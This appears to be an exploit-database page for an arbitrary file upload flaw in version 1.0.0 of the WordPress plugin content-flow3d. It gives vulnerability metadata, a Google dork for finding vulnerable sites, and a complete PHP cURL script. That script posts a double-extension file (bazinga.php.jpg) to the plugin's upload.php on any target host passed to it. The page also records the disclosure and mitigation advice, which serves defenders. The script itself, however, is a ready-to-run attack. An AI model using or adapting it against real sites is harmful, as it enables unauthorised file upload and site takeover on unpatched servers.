header-logo
Suggest Exploit
vendor:
content-flow3d
by:
g11tch
5.5
CVSS
MEDIUM
Arbitrary File Upload
434
CWE
Product Name: content-flow3d
Affected Version From: 1.0.0
Affected Version To: 1.0.0
Patch Exists: NO
Related CWE:
CPE: a:wordpress:content-flow3d:1.0.0
Metasploit:
Other Scripts:
Platforms Tested: CentOS, Ubuntu Server 11.04
2012

WordPress content-flow3d Arbitrary File Upload

This exploit allows an attacker to upload arbitrary files to a vulnerable Wordpress plugin called content-flow3d. The attacker needs to provide the target URL as a command-line argument. The exploit uses cURL to send a POST request to the upload.php file of the plugin with a file named bazinga.php.jpg. The exploit is tested on CentOS and Ubuntu Server 11.04.

Mitigation:

The vulnerability can be mitigated by applying the latest patches or removing the vulnerable plugin.
Source

Exploit-DB raw data:

# Exploit Title: Wordpress content-flow3d Arbitrary File Upload 
# Google Dork: inurl:plugins/content-flow3d/
# Date: 10June2012
# Exploit Author: g11tch
# Vendor Homepage: http://wordpress.org/extend/plugins/content-flow3d/
# Software Link: downloads.wordpress.org/plugin/content-flow3d.zip
# Version: 1.0.0
# Tested on: CentOS, Ubuntu Server 11.04

Greets in no particular order
pfizer.inc   for the constant motivation
pr1me, The_Eccentric, Spridel, Hackett, DrB0n3z, 
merci Sammy Forgit pour l'expression correcte
###############################################

#!/usr/bin/php -f
<?php
#
# upload.php curl exploit
#
//
// HTTP FILES,
//

$target = $argv[1];

$postData = array();
$postData[ 'qqfile' ] = "bazinga.php.jpg";

$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_URL, "http://$target/upload.php");
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postData );
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);
curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target");
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);

echo $buf;
?>

Navigation

Suggest Exploit

Services By CQR